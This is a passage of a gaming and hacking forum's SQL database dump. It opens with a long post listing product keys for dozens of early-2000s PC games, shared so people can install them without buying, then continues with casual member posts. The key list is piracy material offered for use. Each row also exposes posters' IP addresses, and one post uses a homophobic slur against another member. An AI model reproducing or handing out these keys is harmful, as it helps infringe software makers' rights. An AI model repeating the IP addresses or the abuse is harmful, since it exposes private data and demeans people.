Secrets[/b]\r\n[b]1501-0514490-6731402-3052[/b]\r\n[b]------------[/b]\r\n[b]Tiger Woods PGA Tour 2003[/b]\r\n[b]FLTR-O262-2292-1RV4[/b]\r\n[b]FLTR-O275-2254-1RTA[/b]\r\n[b]FLTR-O378-2235-1RKH[/b]\r\n[b]FLTR-O361-3294-1RT7[/b]\r\n[b]FLTR-O464-3296-1RV9[/b]\r\n[b]FLTR-O467-3233-1RSA[/b]\r\n[b]FLTR-O560-4242-1RUB[/b]\r\n[b]FLTR-O553-4282-1RU7[/b]\r\n[b]FLTR-O556-4263-1RVC[/b]\r\n[b]------------[/b]\r\n[b]Hot Pursuit 2:[/b]\r\n[b]S6UQ-SAT5-39U5-2VXF[/b]\r\n[b]D5P6-YQG4-CPP4-3FPJ[/b]\r\n[b]GT5J-USVG-GV5G-2QX6[/b]\r\n[b]------------[/b]\r\n[b]Fifa 2003:[/b]\r\n[b]DEVI-ANCE-RULE-ZF79[/b]\r\n[b]3133-7313-3731-3KGH[/b]\r\n[b]DEVI-ANCE-2002-XF7B[/b]\r\n[b]------------[/b]\r\n[b]Need For Speed: Hot Pursuit 2:[/b]\r\n[b]8249-7EE3-84EW-TXGT[/b]\r\n[b]------------[/b]\r\n[b]The Gladiators :[/b]\r\n[b]UK-9B4E-FFFF-F6FA-770C-BD42[/b]\r\n[b]UK-CE73-FFFF-8DBB-0407-D629[/b]\r\n[b]UK-E404-FFFF-D3F7-92D9-52AD[/b]\r\n[b]UK-822F-FFFF-7BAB-A591-21DE[/b]\r\n[b]UK-4DCF-FFFF-EAF4-E44A-C936[/b]\r\n[b]UK-9AF3-FFFF-B6DE-B3F2-916E[/b]\r\n[b]UK-0ED8-FFFF-8477-D6C7-7689[/b]\r\n[b]UK-4F79-FFFF-D9DC-B4B4-11EE[/b]\r\n[b]UK-D1D5-FFFF-49FA-F0D8-1BE4[/b]\r\n[b]UK-4818-FFFF-5A0E-203E-8E71[/b]\r\n[b]UK-2B3F-FFFF-A004-CAF5-1EE1[/b]\r\n[b]------------[/b]\r\n[b]Nascar Thunder 2003:[/b]\r\n[b]NASC-ARTH-UNDE-RJAM[/b]\r\n[b]FAIR-LIGH-TOWN-*MBD[/b]\r\n[b]CANT-CRAK-2810-*RS4[/b]\r\n[b]OWND-OWND-OWND-UXKV[/b]\r\n[b]NOLO-ADER-REQD-UFKD[/b]\r\n[b]PLAY-THEG-AME!-*DT3[/b]\r\n[b]ITSI-NTHE-GAME-*AJ9[/b]\r\n[b]DRIV-EINC-IRCL-E84X[/b]\r\n[b]FLTF-LTFL-TFLT-*RK5[/b]\r\n[b]NOSP-EEDO-HERE-*FAM[/b]\r\n[b]NOTR-AFFI-CCOP-SADQ[/b]\r\n[b]OHAN-OTHE-RGAM-E9KJ[/b]\r\n[b]CODE-CODE-CODE-*4C6[/b]\r\n[b]CARS-CARS-CARS-*E2C[/b]\r\n[b]NOSP-EEDB-UMPS-*F3L[/b]\r\n[b]CLS0-FLT1-RULE-15A9[/b]\r\n[b]------------[/b]\r\n[b]Age Of Mythology:[/b]\r\n[b]qvw83-4mc67-fdpth-49pt8-6hgrd[/b]\r\n[b]------------[/b]\r\n[b]NHL 2003:[/b]\r\n[b]VBD5-34BJ-Q103-K52Y[/b]\r\n[b]MQSA-XY1H-3BLE-FAM7[/b]\r\n[b]JNS9-009W-4H7A-SA3R[/b]\r\n[b]------------[/b]\r\n[b]Unreal Tournament 2003:[/b]\r\n[b]YBLMH-P8F3W-A3W6X-UEWJ6[/b]\r\n[b]KFYTK-RQE8Q-BBW96-AAM8F[/b]\r\n[b]YMTFR-BQFYE-A7BKL-2UC8Q[/b]\r\n[b]serial:LYR22-RZ743-A9D7T-CNNEN[/b]\r\n[b]------------[/b]\r\n[b]Earth 2150: Lost Souls[/b]\r\n[b]7XJC-UD2E-E83L-Z5T5[/b]\r\n[b]------------[/b]\r\n[b]Frontline Attack: War Over Europe[/b]\r\n[b]FUBP-EYNZ-KFXC-SKM2[/b]\r\n[b]------------[/b]\r\n[b]Empire Earth: The Art of Conquest[/b]\r\n[b]GER2-MAN2-RAP2-PER5-2252[/b]\r\n[b]------------[/b]\r\n[b]Battlefield 1942:[/b]\r\n[b]5000-0000000-0000000-1318[/b]\r\n[b]------------[/b]\r\n[b]Emperor: Rise of the Middle Kingdom[/b]\r\n[b]BAC9-RAL8-SAS2-SAX2-9999[/b]\r\n[b]RED2-DAD2-RAD2-DAD2-8888[/b]\r\n[b]BAB2-DAD2-BAB2-DAD4-2247[/b]\r\n[b]GAG2-FAF2-GAG2-FAF5-2257[/b]\r\n[b]BAB2-RAL2-BAB2-FAF5-2279[/b]\r\n[b]RAD2-RAL2-RAD2-FAF3-2289[/b]\r\n[b]RAD2-RAD2-RAD2-RAD2-2247[/b]\r\n[b]TAD2-TAD2-TAD2-TAD5-2253[/b]\r\n[b]BAD2-BAD2-BAD2-BAD4-2267[/b]\r\n[b]DAD2-MAC2-DAD2-MAC4-2269[/b]\r\n[b]GAD2-ZUC2-GAD2-ZUC3-2225[/b]\r\n[b]RED2-MAC2-RED2-BAD2-2269[/b]\r\n[b]RED2-DED2-RED2-DED5-2228[/b]\r\n[b]BUG2-GER2-MAD2-BAT3-2236[/b]\r\n[b]BUG2-GER2-MAT2-MAD3-2289[/b]\r\n[b]BUG2-GER2-GER2-MAN2-2284[/b]\r\n[b]BAD2-GER2-BUG2-GER2-2286[/b]\r\n[b]BAD2-GER2-MAN2-MAN3-2236[/b]\r\n[b]RUG2-GER2-MAN2-MAN5-2277[/b]\r\n[b]RED2-RAG2-RAG2-RED2-2288[/b]\r\n[b]BED2-NAP2-NAP2-BED3-2279[/b]\r\n[b]NAP2-PED2-CAT2-NAP5-2289[/b]\r\n[b]RAP2-PER2-BAD2-CAT2-2238[/b]\r\n[b]BAD2-MAG2-SAD2-FAG3-2269[/b]\r\n[b]------------[/b]\r\n[b]Rally Trophy:[/b]\r\n[b]6204-a39b-03f3-68d1[/b]\r\n[b]------------[/b]\r\n[b]Operation Flashpoint: Resistance Addon[/b]\r\n[b]BS0P NEKED 838CB NNP3X 183F3[/b]\r\n[b]HFX2 FX7FL XNW7Z 2C7SV VH9XH[/b]\r\n[b]DFE6 S2VB8 DZAV8 4WHGY LTHJ4[/b]\r\n[b]------------[/b]\r\n[b]Delta Force: Task Force Dagger[/b]\r\n[b]72YL-R4SB-GKG6-3WKS-HQ27[/b]\r\n[b]------------[/b]\r\n[b]Cricket 2002:[/b]\r\n[b]4792-1088041-9269636-4601[/b]\r\n[b]------------[/b]\r\n[b]The Fate:[/b]\r\n[b]68CD687-E8449C5B-E8I388AC48[/b]\r\n[b]------------[/b]\r\n[b]Neverwinter Nights:[/b]\r\n[b]CH37D-QXPRX-34U7F-9FL3N-QLKTC-CFGCT-3J9DG[/b]\r\n[b]3QJ9A-EJMW9-CR7UE-64D9Q-J9KKE-FDKDR-U3DQ3[/b]\r\n[b]YTKH9-MYLJX-X77RJ-KFMXF-Y9XQ9-39NVV-C4VU9[/b]\r\n[b]------------[/b]\r\n[b]Return to Castle Wolfenstein:Game of the Year Edition[/b]\r\n[b]SL3H-SSPG-B3JL-LPCC-A5[/b]\r\n[b]------------[/b]\r\n[b]MechWarrior 4: Inner Sphere Mech Pak[/b]\r\n[b]gf8tg-t6gtt-h667t-p9qg7-67bcw[/b]\r\n[b]------------[/b]\r\n[b]Warcraft III:[/b]\r\n[b]1JEPYU-ZIOF-WTQH40-CDBK-1VLJTH[/b]\r\n[b]35M7SW-NB42-I96B78-CBAE-0D211S[/b]\r\n[b]BVDO9C-A65T-0Z34R7-C4E1-2PXMYE[/b]\r\n[b]------------[/b]\r\n[b]Gore:[/b]\r\n[b]5FFE-62A6-BE89-C15B[/b]\r\n[b]6FF8-0772-FC04-237F[/b]\r\n[b]6FF9-0437-8FA9-9874[/b]\r\n[b]------------[/b]\r\n[b]Team Factor:[/b]\r\n[b]DCAZ7ZZ-9DBFDU1[/b]\r\n[b]YPZY8C3-9D538FE[/b]\r\n[b]6WPRRYN-R3PYRWP[/b]\r\n[b]------------[/b]\r\n[b]Soldier Of Fortune II Double Helix :[/b]\r\n[b]MTKW-FTMK-EMFE-W3P3-B7[/b]\r\n[b]------------[/b]\r\n[b]Global Operations:[/b]\r\n[b]5501-0000000-0000000-4549[/b]\r\n[b]8427-5179437-7505878-5806[/b]\r\n[b]5000-0000000-0000000-5021[/b]\r\n[b]------------[/b]\r\n[b]Aquanox:[/b]\r\n[b]7111-02a1-db82-0b06[/b]\r\n[b]3111-3982-49d0-1eb3[/b]\r\n[b]5111-39d9-b3e7-8819[/b]\r\n[b]------------[/b]\r\n[b]Triple Play Baseball 2002:[/b]\r\n[b]0204-3939889-8825252-2002[/b]\r\n[b]2500-7240579-3830751-5535[/b]\r\n[b]------------[/b]\r\n[b]Three Kingdoms 2:[/b]\r\n[b]00724-60871-24289-09053[/b]\r\n[b]00730-00504-53989-89682[/b]\r\n[b]------------[/b]\r\n[b]Simcity 3000 :[/b]\r\n[b]2001-5076965-7787848-3962[/b]\r\n[b]2001-9345001-2906628-6166[/b]\r\n[b]2001-0047391-0117848-2719[/b]\r\n[b]------------[/b]\r\n[b]Star Craft: Brood War[/b]\r\n[b]3423-72091-2107[/b]\r\n[b]3423-72093-2758[/b]\r\n[b]3423-73086-2128[/b]\r\n[b]------------[/b]\r\n[b]Star Craft:[/b]\r\n[b]2602-89590-6961[/b]\r\n[b]2602-94589-6970[/b]\r\n[b]2603-28588-6845[/b]\r\n[b]------------[/b]\r\n[b]F1 2001 :[/b]\r\n[b]4502-9028156-8500964-3534[/b]\r\n[b]------------[/b]\r\n[b]Maddog 2000 :[/b]\r\n[b]6754-IPZZ4XY[/b]\r\n[b]------------[/b]\r\n[b]The Settlers IV:[/b]\r\n[b]1576-5655-2355-6565[/b]\r\n[b]------------[/b]\r\n[b]Legends of Might & Magic:[/b]\r\n[b]2b09-24c6-9894-c18f[/b]\r\n[b]------------[/b]\r\n[b]Angel :[/b]\r\n[b]ATT-0948-812[/b]\r\n[b]------------[/b]\r\n[b]Nox :[/b]\r\n[b]017934-718048-114782-5775[/b]\r\n[b]------------[/b]\r\n[b]Kingdom Under Fire:[/b]\r\n[b]A1AH-CQFA-T0LE-LVK3[/b]\r\n[b]------------[/b]\r\n[b]The Typing of the Dead :[/b]\r\n[b]TDK02200-176403-17407[/b]\r\n[b]------------[/b]\r\n[b]The Settlers 3 :[/b]\r\n[b]3416-3922-3505-3216-1252[/b]\r\n[b]------------[/b]\r\n[b]Sega GT:[/b]\r\n[b]GTJ08010-322007-01723[/b]\r\n[b]------------[/b]\r\n[b]NBA Live 2001:[/b]\r\n[b]2001-0020601-0010978-6694[/b]\r\n[b]------------[/b]\r\n[b]Home World : Cata Ciysm[/b]\r\n[b]GAF6-CAB4-SEX5-ZYL6-2622[/b]\r\n[b]------------[/b]\r\n[b]Ultimate Hunt :[/b]\r\n[b]14067 CHOW VATS SLAP CLAY[/b]\r\n[b]------------[/b]\r\n[b]Sacrifice :[/b]\r\n[b]29NF-WJTL-7OIZ-NYRS[/b]\r\n[b]------------[/b]\r\n[b]Rich5 :[/b]\r\n[b]GB:6ef9d-33rut49ei6-dd8rt[/b]\r\n[b]Big:5J02MF-2J9UM-I1FHA[/b]\r\n[b]------------[/b]\r\n[b]Lunatic IV :[/b]\r\n[b]281-EBE02-93E-BF9A1[/b]\r\n[b]------------[/b]\r\n[b]Black & White:[/b]\r\n[b]0901-3324366-4702210-2081[/b]\r\n[b]------------[/b]\r\n[b]The Sims : House Party[/b]\r\n[b]0901 4177371 2064872 3510[/b]\r\n[b]------------[/b]\r\n[b]SimCoaster:[/b]\r\n[b]2001-0013101-0010978-2823[/b]\r\n[b]------------[/b]\r\n[b]The Sims Livin\' Large:[/b]\r\n[b]2500-5149691-2267453-0556[/b]\r\n[b]------------[/b]\r\n[b]Kohan: Immortal Sovereigns[/b]\r\n[b]6bd9-9a56-bc85-455a[/b]\r\n[b]------------[/b]\r\n[b]Real Air Traffic Controller 2[/b]\r\n[b]044-0800-23000007152226[/b]\r\n[b]------------[/b]\r\n[b]Deep Space Nine Dominion Wars :[/b]\r\n[b]1000-7064[/b]\r\n[b]------------[/b]\r\n[b]Outlive:[/b]\r\n[b]c61e41-a3f465-4674c1-ace71f[/b]\r\n[b]------------[/b]\r\n[b]Nascar Racing 4 :[/b]\r\n[b]GAC7-REB8-TUX6-DAC2-7833[/b]\r\n[b]------------[/b]\r\n[b]Adventure Pinball: Forgotten Island[/b]\r\n[b]0901-3066676-3327010-9227[/b]\r\n[b]------------[/b]\r\n[b]Elite Force Expansion Pack :[/b]\r\n[b]4008-b491-1dc3-0f6c[/b]\r\n[b]------------[/b]\r\n[b]Star Trek Starfleet Command 2 Empires at War:[/b]\r\n[b]RYS8-LAB4-JEF8-BYM3-4652[/b]\r\n[b]------------[/b]\r\n[b]Orion Pirates:[/b]\r\n[b]70b2-b6c7-28c5-0c4a[/b]\r\n[b]------------[/b]\r\n[b]Gunman Chronicles :[/b]\r\n[b]2609-57245-0368[/b]\r\n[b]------------[/b]\r\n[b]Quake 3: Team Arena[/b]\r\n[b]TSBH-7CCG-DPWP-B2LT-84[/b]\r\n\r\n[b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b]\r\n\r\n[b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b]\r\n\r\n\r\n\r\n\r\n[b]50,000 Cd Keys Of Pc Games[/b]\r\n[b][/b][/b]\r\n\r\n[b]The Typing of the Dead:[/b]\r\n[b]TDK02200-176403-17407[/b]\r\n[b]------------[/b]\r\n[b]Tiger Woods PGA Tour 2001:[/b]\r\n[b]1500-3202255-2068109-2932[/b]\r\n[b]------------[/b]\r\n[b]Superbikes 2001:[/b]\r\n[b]1500-4288423-2982915-3163[/b]\r\n[b]------------[/b]\r\n[b]American McGee\'s Alice:[/b]\r\n[b]2500-5248097-9624846-2118[/b]\r\n[b]------------[/b]\r\n[b]Half-Life: Opposing Force[/b]\r\n[b]DYP6-MYL8-GYG4-BET3-6283[/b]\r\n[b]------------[/b]\r\n[b]Sub Command Seawolf Akula:[/b]\r\n[b]0901-1315206-2102812-3248[/b]\r\n[b]------------[/b]\r\n[b]FA Premier League Manager 2002 :[/b]\r\n[b]4507-1863659-3033569-5650[/b]\r\n[b]------------[/b]\r\n[b]Madden NFL 2002:[/b]\r\n[b]0901-5445152-2745753-4827[/b]\r\n[b]1500-6610360-1643530-0243[/b]\r\n[b]------------[/b]\r\n[b]NHL 2002 :[/b]\r\n[b]1000-2003004-0000000-4904[/b]\r\n[b]------------[/b]\r\n[b]Throne of Darkness :[/b]\r\n[b]RAC2-RAD2-RAC2-RAC2-3387[/b]\r\n[b]------------[/b]\r\n[b]Come On Baby :[/b]\r\n[b]8004-8846-7038-2877[/b]\r\n[b]------------[/b]\r\n[b]Delta Force: Land Warrior[/b]\r\n[b]N5E3-YXH2-G983-9WYB-B3ZS[/b]\r\n[b]------------[/b]\r\n[b]Soldier Of Fortune II Double Helix *BETA* :[/b]\r\n[b]3Z4J - J3PP - K848 - EWPK - 1F[/b]\r\n[b]------------[/b]\r\n[b]Zax The Alien Hunter :[/b]\r\n[b]0000-2059-5800-0000-0001[/b]\r\n[b]0000-2714-9300-0000-0001[/b]\r\n[b]0000-3370-2800-0000-0001[/b]\r\n[b]0000-4025-6300-0000-0001[/b]\r\n[b]0000-4680-9800-0000-0001[/b]\r\n[b]0081-2072-1800-0000-0001[/b]\r\n[b]0081-2727-5300-0000-0001[/b]\r\n[b]0081-3382-8800-0000-0001[/b]\r\n[b]0359-9972-0400-0000-0001[/b]\r\n[b]0360-0627-3900-0000-0001[/b]\r\n[b]0360-1282-7400-0000-0001[/b]\r\n[b]0360-1938-0900-0000-0001[/b]\r\n[b]0392-7647-0400-0000-0001[/b]\r\n[b]0392-8302-3900-0000-0001[/b]\r\n[b]0392-8957-7400-0000-0001[/b]\r\n[b]0392-9613-0900-0000-0001[/b]\r\n[b]0393-0268-4400-0000-0001[/b]\r\n[b]0393-0923-7900-0000-0001[/b]\r\n[b]------------[/b]\r\n[b]Mr Driller :[/b]\r\n[b]ALC3-E4NW-2CY3-2WLE[/b]\r\n[b]------------[/b]\r\n[b]Red Alert 2:[/b]\r\n[b]030676-380249-256222-9234[/b]\r\n[b]030656-018225-019382-0579[/b]\r\n[b]------------[/b]\r\n[b]Shogun:Total War[/b]\r\n[b]1600-0052410-0052410-6424[/b]\r\n[b]------------[/b]\r\n[b]Emperor: Battle for Dune[/b]\r\n[b]036642-256734-246754-5204[/b]\r\n[b]------------[/b]\r\n[b]Dark Reign 2:[/b]\r\n[b]gad6-teb4-cup9-pap6-5529[/b]\r\n[b]------------[/b]\r\n[b]Vampire: The Masquerade[/b]\r\n[b]RAC2-SAL2-GAT3-RAD3-6545[/b]\r\n[b]------------[/b]\r\n[b]Soldier Of Fortune:[/b]\r\n[b]ben2-bac7-buz6-jad3-9742[/b]\r\n[b]------------[/b]\r\n[b]The Sims:[/b]\r\n[b]100486-585530-905808-0928[/b]\r\n[b]------------[/b]\r\n[b]FIFA World Cup 2002 :[/b]\r\n[b]2500-2586941-6567281-4645[/b]\r\n[b]0901-3482564-1716312-0441[/b]\r\n[b]------------[/b]\r\n[b]Diablo II:[/b]\r\n[b]2V97-9DKN-F9HC-JCJE[/b]\r\n[b]4MTF-KW7R-CBR6-GPRE[/b]\r\n[b]KWDN-H67J-B8GB-FDD6[/b]\r\n[b]------------[/b]\r\n[b]Diablo II: Lord of Destruction[/b]\r\n[b]KTB9-N7BP-CR8N-49VX[/b]\r\n[b]4ENZ-N7BV-TKFD-J7NG[/b]\r\n[b]4EBC-4GCB-MV74-NHPB[/b]\r\n[b]------------[/b]\r\n[b]Half-Life: Counter Strike[/b]\r\n[b]1234-56789-0123[/b]\r\n[b]3496-74811-7825[/b]\r\n[b]5198-13905-4846[/b]\r\n[b]3697-24619-0806[/b]\r\n[b]------------[/b]\r\n[b]FIFA 2002 :[/b]\r\n[b]2501-2973603-4208783-4109[/b]\r\n\r\n\r\n[b]Age of Mythology: XDWXF-2JCVG-VTX6T-6KYQ9-QDC4G[/b]\r\n\r\n[b]Age of Mythology: RD4D4-B94XK-QVWFP-K9PJD-GVRV3[/b]\r\n\r\n[b]Age of Mythology: QVW83-4MC67-FDPTH-49PT8-6HGRD[/b]\r\n[b]Alien vs Predators 2: rec6-fab6-gen7-duf7-4344[/b]\r\n[b]American McGee\'s Alice: 2000-0112900-0010978-3379[/b]\r\n\r\n[b]American McGee\'s Alice: 6453-7884462-9832102-6449[/b]\r\n\r\n[b]Battlefield 1942: 0901-4486830-1635751-2230[/b]\r\n[b]Battlefield 1942: 0901-2857682-5631883-1206[/b]\r\n[b]Battlefield 1942: 0901-5424665-0520057-1232[/b]\r\n[b]Battlefield 1942: 5000-0000000-0000000-1318[/b]\r\n[b]Battlefield 1942 Road to Rome: 4906-9626506-2206381-5368[/b]\r\n[b]Battlefield 1942 Road to Rome: 8456-5984327-7540897-4330[/b]\r\n[b]Battlefield 1942 Road to Rome: 2256-2303935-1818093-2776[/b]\r\n\r\n[b]Battlefield 1942 Secret Weapons of WWII: 0901-0120062-1518273-2120[/b]\r\n[b]Battlefield 1942 Secret Weapons of WWII: 4509-4188686-4654577-0456[/b]\r\n[b]Big Scale Racing (ISO): 8060-7476-B821-5B42[/b]\r\n[b]Big Scale Racing (ISO): FC43-5961-5D24-B071[/b]\r\n[b]Big Scale Racing (ISO): 1EGO-E5AI-66SG-23AY[/b]\r\n[b]Big Scale Racing (ISO): 7DGE-64NI-94US-C201[/b]\r\n[b]Big Scale Racing (ISO): 7F34-7F78-56AB-8FEF[/b]\r\n[b]Black & White: 0901-3324366-4702210-2081[/b]\r\n[b]Black & White: 3609-8077379-3488008-4192[/b]\r\n[b]Black & White: 0239-3149551-0576661-5531[/b]\r\n[b]Black & White Creatures Isle: 2394-1529829-3567371-5124[/b]\r\n[b]Black & White Creatures Isle: 7655-0015767-1953964-2153[/b]\r\n[b]Black & White Creatures Isle: 3379-8714263-1181459-4465[/SPOILER]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8bab7563f013562cc2b2f8abd085e4bd', '0', '0'); INSERT INTO mybb_posts VALUES('5467', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '62', 'R?????zo?', '1350597491', 'I think android it\'s better even though I have iOS :p', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1db30f2640021266c7fc52eeb97bd430', '0', '0'); INSERT INTO mybb_posts VALUES('5468', '975', '5456', '7', 'RE: how do i insert a pic', '0', '228', 'VirtualLegend', '1350597533', 'Quick tutorial:\n\n1. Upload Your Images at i.imgur.com (You don\'t have to make a account)\n2. Than Click the image until the background is white\n3. Than Copy the URL \n4. Past it like this; [img]PAST LINK IN HERE[/img]\n\nAnd Tadaaaa Your Done', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'fd235492040e000f2b1483c24a9b3416', '0', '0'); INSERT INTO mybb_posts VALUES('5469', '971', '5465', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '62', 'R?????zo?', '1350597549', '[quote=\'VirtualLegend\' pid=\'5465\' dateline=\'1350597296\']\r\nNice Thread, \r\nTip; Center it in the middle (Looks way more better ;) )\r\n[/quote]\r\n\r\nDone :)\r\nthanks for the tip!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c9c04b848c5f228ae005053b934e3dd9', '0', '0'); INSERT INTO mybb_posts VALUES('5470', '973', '5454', '19', 'RE: New HF Logo?', '0', '257', 'XxTREYZxX', '1350597574', 'wow thats not nice at all :O', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'bbac0cea497eb97b296dadc83fc33672', '0', '0'); INSERT INTO mybb_posts VALUES('5471', '976', '5459', '71', 'RE: Halo 4', '0', '62', 'R?????zo?', '1350597599', 'Looks promising, I\'d get it if I had an xbox :(\nI loved playing previous Halo\'s', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ffedc0ca33e7d4c4f33d5eac6e9fbe76', '0', '0'); INSERT INTO mybb_posts VALUES('5472', '976', '5471', '71', 'RE: Halo 4', '0', '257', 'XxTREYZxX', '1350597704', '[quote=\'R?????zo?\' pid=\'5471\' dateline=\'1350597599\']\r\nLooks promising, I\'d get it if I had an xbox :(\r\nI loved playing previous Halo\'s\r\n[/quote]\r\n\r\nyeah there not to bad aye :O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '169fe6deb66f0158d783da6d7969cfda', '0', '0'); INSERT INTO mybb_posts VALUES('5473', '975', '5456', '7', 'RE: how do i insert a pic', '0', '257', 'XxTREYZxX', '1350597880', 'thanks every one, i did it now i cant see my pic its just a whit rectangle with a little piece of paper on it fuuuuuuuuuuuuuuuuu', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '530e70c4bbb0ff0886260e4d7c0aa055', '0', '0'); INSERT INTO mybb_posts VALUES('5474', '971', '5449', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '257', 'XxTREYZxX', '1350597972', 'another great share keep up the good work:O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'f90220cc1e74fc1a2c425c55a6928431', '0', '0'); INSERT INTO mybb_posts VALUES('5475', '603', '5275', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350598755', '[quote=\'ƒ???????????g\' pid=\'5275\' dateline=\'1350543923\']\r\nOh alright can I check it out? What do you have to pm me it?\r\n[/quote]\r\n\r\nI have PMed you the source, Check your inbox.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ca7849617ec16740461e0dbbc756d1c8', '0', '0'); INSERT INTO mybb_posts VALUES('5476', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '3', '??????????¢™', '1350598968', 'Dont really understand it but thanks for sharing this.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'a5702b4101e02c1f19d0e884554f0d2e', '0', '0'); INSERT INTO mybb_posts VALUES('5477', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350599275', 'Doesn\'t work..\n\nFix your signature and avatar image.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c3301021e66f4b3035ad138223dce442', '0', '0'); INSERT INTO mybb_posts VALUES('5478', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '82', 'iTzIpod', '1350599318', 'I know.\nI\'m busy with my relationship with my girlfriend and also busy with homework. :/\n\nI try to go on LH everyday.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '11f48569e7c2778feaefe19fb247b0e2', '0', '0'); INSERT INTO mybb_posts VALUES('5479', '975', '5456', '7', 'RE: how do i insert a pic', '0', '222', 'Exposé', '1350599740', 'I recommend downloading a program called TinyGrab. It\'s easier to get screenshots :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a28324dc2c8f28cef752131af9166ce9', '0', '0'); INSERT INTO mybb_posts VALUES('5480', '981', '0', '4', 'Whatsup Holmes.', '0', '278', 'Yoess', '1350600629', 'Hello guys whatsup,\nIm Yoess 16 years old, live in the Netherlands.\nDoing the old things, making new mates here.\nIm also a friend of VirtualLegend.\nWe all make new things happen.\nPeace!', '82.157.58.115', '1386035827', '0', '0', '278', '1350615056', '1', 'fd4b88fb7977b36ea9b9a2e918711113', '0', '1350615056'); INSERT INTO mybb_posts VALUES('5481', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '228', 'VirtualLegend', '1350600691', 'Welcome to LH\nStay Active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cf9d23d69438dabc26dae26f31586194', '0', '0'); INSERT INTO mybb_posts VALUES('5482', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '3', '??????????¢™', '1350600925', 'Welcome to LH, We wish you a nice warm welcome and we hope you enjoy your stay.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'aad40ca578a072350860e4370ee42d39', '0', '0'); INSERT INTO mybb_posts VALUES('5483', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '222', 'Exposé', '1350600971', 'Sup dude welcome to LH and hope you enjoy your stay :d', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '08bc03f6b18d1b05af1acf5628d8f370', '0', '0'); INSERT INTO mybb_posts VALUES('5484', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '222', 'Exposé', '1350601220', 'I like it but you should definately change it so it\'s green to match the site :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f2a242a930a5fe347a66464e7c486ff5', '0', '0'); INSERT INTO mybb_posts VALUES('5485', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '222', 'Exposé', '1350601277', 'Just reminding you to make mah sig tmrw :P....thanks broski', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '12814b228a5fb42c01dc48987a27cc7f', '0', '0'); INSERT INTO mybb_posts VALUES('5486', '978', '5461', '73', 'RE: IOS vs ANDROID', '0', '222', 'Exposé', '1350601389', 'I think ios is better personally but they are both really good', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0709a587089f2df8c6de2f8e7c5470bc', '0', '0'); INSERT INTO mybb_posts VALUES('5487', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '257', 'XxTREYZxX', '1350604491', 'welcome my fellow freind stay active and HQ', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7b208f63e51176b5b6e7d733626f4210', '0', '0'); INSERT INTO mybb_posts VALUES('5488', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350604915', 'yeah i dont know how to sorry its pretty annoying aye', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '844b593366a52ec75d191e8de95c45ea', '0', '0'); INSERT INTO mybb_posts VALUES('5489', '982', '0', '7', 'GREED', '0', '257', 'XxTREYZxX', '1350605140', 'is greed banned because i hate him he\'s a scammer.LQ poster,a faggot and rep abuses people because he feels like it \r\nwho agrees that he is a doosh!', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '35356f12fcdb9e20c21d850ebafeffb0', '0', '0'); INSERT INTO mybb_posts VALUES('5490', '982', '5489', '7', 'RE: GREED', '0', '100', '??zg???g????61', '1350605623', 'Before calling someone a LQ poster, try to make more HQ posts yourself. I\'m not very fond of Greed either, but it bugs me when people are hypocritical. You used poor grammar, poor punctuation and you miss-spelled douche.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2eebd0516b6b9ac0aeffd9a23aa1a972', '0', '0'); INSERT INTO mybb_posts VALUES('5491', '982', '5490', '7', 'RE: GREED', '0', '257', 'XxTREYZxX', '1350605893', '[quote=\'??zg???g????61\' pid=\'5490\' dateline=\'1350605623\']\r\nBefore calling someone a LQ poster, try to make more HQ posts yourself. I\'m not very fond of Greed either, but it bugs me when people are hypocritical. You used poor grammar, poor punctuation and you miss-spelled douche.\r\n[/quote]\r\n\r\nmy grammar isn\'t that bad.and same as my spelling', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'b52946eb123997997dd9f79adc6fd7a5', '0', '0'); INSERT INTO mybb_posts VALUES('5492', '971', '5449', '9', 'RE: EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '100', '??zg???g????61', '1350605918', 'Damn thanks a ton Reload, your threads are always HQ (:', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3e5f4be199035f93d6a51838f1f15bab', '0', '0'); INSERT INTO mybb_posts VALUES('5493', '982', '5489', '7', 'RE: GREED', '0', '100', 